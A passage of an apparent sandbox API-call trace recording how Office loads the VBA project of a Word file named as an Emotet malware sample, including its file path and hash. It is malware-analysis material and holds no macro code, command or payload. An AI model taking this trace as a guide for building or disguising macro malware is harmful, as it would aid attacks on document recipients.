Locale=0x800, dwInfoType=0x4, lpSrcStr="\xa0", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.770] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xa1", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.770] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xa2", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.770] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xa3", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.770] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xa4", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.770] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xa5", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.770] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xa6", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.770] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xa7", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.770] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xa8", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.770] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xa9", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.770] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xaa", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.770] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xab", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.770] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xac", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.770] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xad", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.770] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xae", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.770] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xaf", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.770] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xb0", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.770] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xb1", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.770] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xb2", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.770] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xb3", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.770] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xb4", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.770] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xb5", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.771] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xb6", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.771] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xb7", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.771] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xb8", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.771] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xb9", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.771] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xba", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.771] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xbb", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.771] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xbc", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.771] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xbd", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.771] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xbe", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.771] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xbf", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.771] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xc0", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.771] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xc1", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.771] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xc2", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.771] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xc3", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.771] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xc4", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.771] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xc5", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.771] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xc6", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.771] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xc7", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.771] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xc8", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.771] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xc9", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.771] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xca", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.771] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xcb", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.771] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xcc", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.771] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xcd", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.771] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xce", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.771] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xcf", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.771] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xd0", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.771] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xd1", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.771] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xd2", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.771] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xd3", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.771] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xd4", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.771] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xd5", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.771] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xd6", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.771] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xd7", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.772] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xd8", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.772] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xd9", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.772] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xda", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.772] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xdb", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.772] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xdc", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.772] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xdd", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.772] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xde", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.772] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xdf", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.772] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xe0", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.772] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xe1", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.772] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xe2", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.772] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xe3", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.772] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xe4", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.772] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xe5", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.772] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xe6", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.772] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xe7", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.772] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xe8", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.772] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xe9", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.772] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xea", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.772] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xeb", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.772] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xec", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.772] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xed", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.772] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xee", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.772] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xef", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.772] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xf0", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.772] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xf1", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.772] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xf2", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.772] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xf3", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.772] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xf4", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.772] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xf5", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.772] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xf6", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.772] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xf7", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.772] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xf8", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.772] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xf9", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.773] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xfa", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.773] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xfb", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.773] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xfc", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.773] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xfd", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.773] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xfe", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.773] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xff", cchSrc=1, lpCharType=0x146260 | out: lpCharType=0x146260) returned 1 [0067.773] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0067.773] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Name") returned 0x10e2ff [0067.773] IMalloc:Alloc (This=0x7fefec05380, cb=0x8) returned 0x6a59890 [0067.773] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x258d400 [0067.773] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a59890, cbMultiByte=8, lpWideCharStr=0x258d400, cchWideChar=8 | out: lpWideCharStr="cU1A41_") returned 8 [0067.773] IMalloc:Free (This=0x7fefec05380, pv=0x6a59890) [0067.773] IMalloc:Free (This=0x7fefec05380, pv=0x258d400) [0067.773] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0067.773] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Base") returned 0x109fb8 [0067.773] IMalloc:Alloc (This=0x7fefec05380, cb=0x15) returned 0x258d400 [0067.773] IMalloc:Alloc (This=0x7fefec05380, cb=0x2a) returned 0x646f7b0 [0067.773] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x258d400, cbMultiByte=21, lpWideCharStr=0x646f7b0, cchWideChar=21 | out: lpWideCharStr="1Normal.ThisDocument") returned 21 [0067.773] IMalloc:Alloc (This=0x7fefec05380, cb=0x2a) returned 0x646f6b0 [0067.774] IMalloc:Realloc (This=0x7fefec05380, pv=0x6a58da0, cb=0x20) returned 0x682e1c0 [0067.774] IMalloc:Realloc (This=0x7fefec05380, pv=0x6a58f30, cb=0x28) returned 0x682e250 [0067.774] IMalloc:Free (This=0x7fefec05380, pv=0x258d400) [0067.774] IMalloc:Free (This=0x7fefec05380, pv=0x646f7b0) [0067.774] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0067.774] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_GlobalNameSpace") returned 0x10ce77 [0067.774] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="False") returned 0x102d01 [0067.775] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0067.775] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Creatable") returned 0x101d92 [0067.775] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="False") returned 0x102d01 [0067.775] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0067.775] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_PredeclaredId") returned 0x105fc7 [0067.775] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="True") returned 0x10f0f4 [0067.775] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0067.775] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Exposed") returned 0x1030b3 [0067.775] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="True") returned 0x10f0f4 [0067.776] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0067.776] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_TemplateDerived") returned 0x109f1e [0067.776] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="True") returned 0x10f0f4 [0067.776] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0067.776] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Customizable") returned 0x10c26d [0067.776] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="True") returned 0x10f0f4 [0067.776] CExposedStream::Read () returned 0x0 [0067.776] IMalloc:Realloc (This=0x7fefec05380, pv=0xafbdb50, cb=0x258) returned 0xafbdb50 [0067.776] CExposedStream::Release () returned 0x1 [0067.776] CExposedStream::Release () returned 0x0 [0067.777] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="iAAB4Dx", cchWideChar=8, lpMultiByteStr=0x146450, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="iAAB4Dx", lpUsedDefaultChar=0x0) returned 8 [0067.777] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="iAAB4Dx") returned 0x100276 [0067.777] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="iAAB4Dx", cchWideChar=8, lpMultiByteStr=0x146590, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="iAAB4Dx", lpUsedDefaultChar=0x0) returned 8 [0067.777] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="iAAB4Dx") returned 0x100276 [0067.777] IMalloc:Realloc (This=0x7fefec05380, pv=0x6a59870, cb=0x10) returned 0x258d400 [0067.777] IMalloc:Alloc (This=0x7fefec05380, cb=0x80) returned 0xaf60a00 [0067.777] IMalloc:GetSize (This=0x7fefec05380, pv=0xaf60a00) returned 0x80 [0067.777] IMalloc:Alloc (This=0x7fefec05380, cb=0xb8) returned 0xaf02d50 [0067.777] IMalloc:Alloc (This=0x7fefec05380, cb=0xb8) returned 0xaf02e10 [0067.777] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="iAAB4Dx", cchWideChar=8, lpMultiByteStr=0x146450, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="iAAB4Dx", lpUsedDefaultChar=0x0) returned 8 [0067.778] CoCreateGuid (in: pguid=0x146180 | out: pguid=0x146180*(Data1=0x59cfaca3, Data2=0xdbe2, Data3=0x4849, Data4=([0]=0xbd, [1]=0xbd, [2]=0xe6, [3]=0x99, [4]=0x1f, [5]=0xfb, [6]=0x55, [7]=0x4a))) returned 0x0 [0067.778] CoCreateGuid (in: pguid=0x146190 | out: pguid=0x146190*(Data1=0x409cc848, Data2=0x219e, Data3=0x4440, Data4=([0]=0xab, [1]=0x6, [2]=0x58, [3]=0x29, [4]=0xc, [5]=0x4d, [6]=0xf1, [7]=0xc))) returned 0x0 [0067.778] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="iAAB4Dx", cchWideChar=8, lpMultiByteStr=0x1461a0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="iAAB4Dx", lpUsedDefaultChar=0x0) returned 8 [0067.778] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="iAAB4Dx") returned 0x100276 [0067.778] GetLocalTime (in: lpSystemTime=0x146078 | out: lpSystemTime=0x146078*(wYear=0x7e3, wMonth=0x4, wDayOfWeek=0x0, wDay=0xe, wHour=0xe, wMinute=0x25, wSecond=0x4, wMilliseconds=0x3c0)) [0067.778] _ultow_s (in: _Value=0x5e95ca90, _Buffer=0xaf2bb34, _BufferCount=0x9, _Radix=16 | out: _Buffer="5e95ca90") returned 0x0 [0067.778] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="025e95ca90", cchWideChar=11, lpMultiByteStr=0x146010, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="025e95ca90", lpUsedDefaultChar=0x0) returned 11 [0067.778] strcpy_s (in: _Dst=0x6a16c88, _DstSize=0x8, _Src="iAAB4Dx" | out: _Dst="iAAB4Dx") returned 0x0 [0067.778] IMalloc:Realloc (This=0x7fefec05380, pv=0x694fee0, cb=0xd0) returned 0x6a6b820 [0067.778] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="iAAB4Dx") returned 0x100276 [0067.778] wcscpy_s (in: _Destination=0xaf2bb48, _SizeInWords=0x8, _Source="iAAB4Dx" | out: _Destination="iAAB4Dx") returned 0x0 [0067.778] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="iAAB4Dx") returned 0x100276 [0067.778] wcscpy_s (in: _Destination=0xaf2bb58, _SizeInWords=0x8, _Source="iAAB4Dx" | out: _Destination="iAAB4Dx") returned 0x0 [0067.778] IMalloc:Realloc (This=0x7fefec05380, pv=0x258d760, cb=0x24) returned 0x682e1f0 [0067.778] IMalloc:Realloc (This=0x7fefec05380, pv=0x6a58e60, cb=0xc) returned 0x258d760 [0067.778] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="iAAB4Dx") returned 0x100276 [0067.778] IMalloc:Alloc (This=0x7fefec05380, cb=0x54) returned 0x680a2e0 [0067.778] IMalloc:Free (This=0x7fefec05380, pv=0x6a5f190) [0067.778] IMalloc:Alloc (This=0x7fefec05380, cb=0x20) returned 0x682e220 [0067.778] IMalloc:Realloc (This=0x7fefec05380, pv=0x682e220, cb=0x80) returned 0xaf60a90 [0067.778] IMalloc:Free (This=0x7fefec05380, pv=0x680a2e0) [0067.778] IMalloc:Alloc (This=0x7fefec05380, cb=0x3d0) returned 0xaf3e3a0 [0067.778] IMalloc:Alloc (This=0x7fefec05380, cb=0x20) returned 0x682e220 [0067.778] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x258d3a0 [0067.778] IMalloc:Alloc (This=0x7fefec05380, cb=0x80) returned 0xaf60b20 [0067.778] IMalloc:Alloc (This=0x7fefec05380, cb=0x0) returned 0x6a58e60 [0067.778] IMalloc:Alloc (This=0x7fefec05380, cb=0x0) returned 0x6a59870 [0067.778] wcsncpy_s (in: _Destination=0x146160, _SizeInWords=0x108, _Source="*\\CC:\\Users\\aETAdzjz\\Desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc", _MaxCount=0x106 | out: _Destination="*\\CC:\\Users\\aETAdzjz\\Desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc") returned 0x0 [0067.778] CharLowerBuffW (in: lpsz="*\\CC:\\Users\\aETAdzjz\\Desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc", cchLength=0x7e | out: lpsz="*\\cc:\\users\\aetadzjz\\desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc") returned 0x7e [0067.778] IMalloc:Alloc (This=0x7fefec05380, cb=0xfe) returned 0xaf54180 [0067.778] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cc:\\users\\aetadzjz\\desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc", cchWideChar=127, lpMultiByteStr=0xaf54180, cbMultiByte=254, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cc:\\users\\aetadzjz\\desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc", lpUsedDefaultChar=0x0) returned 127 [0067.778] IMalloc:Free (This=0x7fefec05380, pv=0xaf54180) [0067.779] _wcsicmp (_String1="*\\CC:\\Users\\aETAdzjz\\Desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc", _String2="*\\CC:\\Users\\aETAdzjz\\Desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc") returned 0 [0067.779] CExposedDocFile::AddRef () returned 0x4 [0067.779] CExposedDocFile::AddRef () returned 0x5 [0067.779] CExposedDocFile::OpenStream () returned 0x0 [0067.779] CExposedDocFile::Release () returned 0x4 [0067.779] CExposedStream::Seek () returned 0x0 [0067.779] IMalloc:Alloc (This=0x7fefec05380, cb=0x688) returned 0xaf3e780 [0067.779] IMalloc:Alloc (This=0x7fefec05380, cb=0x80) returned 0xaf60bb0 [0067.779] IMalloc:Alloc (This=0x7fefec05380, cb=0x640) returned 0xafbddc0 [0067.779] IMalloc:Alloc (This=0x7fefec05380, cb=0x20) returned 0x682e520 [0067.779] IMalloc:Alloc (This=0x7fefec05380, cb=0x0) returned 0x6a58f30 [0067.779] IMalloc:Alloc (This=0x7fefec05380, cb=0x0) returned 0x6a58da0 [0067.779] IMalloc:Alloc (This=0x7fefec05380, cb=0x20) returned 0x682e4f0 [0067.779] IMalloc:Alloc (This=0x7fefec05380, cb=0x80) returned 0xaf60c40 [0067.779] CExposedStream::AddRef () returned 0x2 [0067.779] CExposedStream::Read () returned 0x0 [0067.779] CExposedStream::AddRef () returned 0x3 [0067.779] CExposedStream::Release () returned 0x2 [0067.779] IMalloc:Alloc (This=0x7fefec05380, cb=0x2ee0) returned 0xafbe410 [0067.779] CExposedStream::Read () returned 0x0 [0067.779] CExposedStream::Read () returned 0x0 [0067.779] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_Evaluate") returned 0x10d918 [0067.779] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0067.779] LHashValOfNameSysA (syskind=0x3, 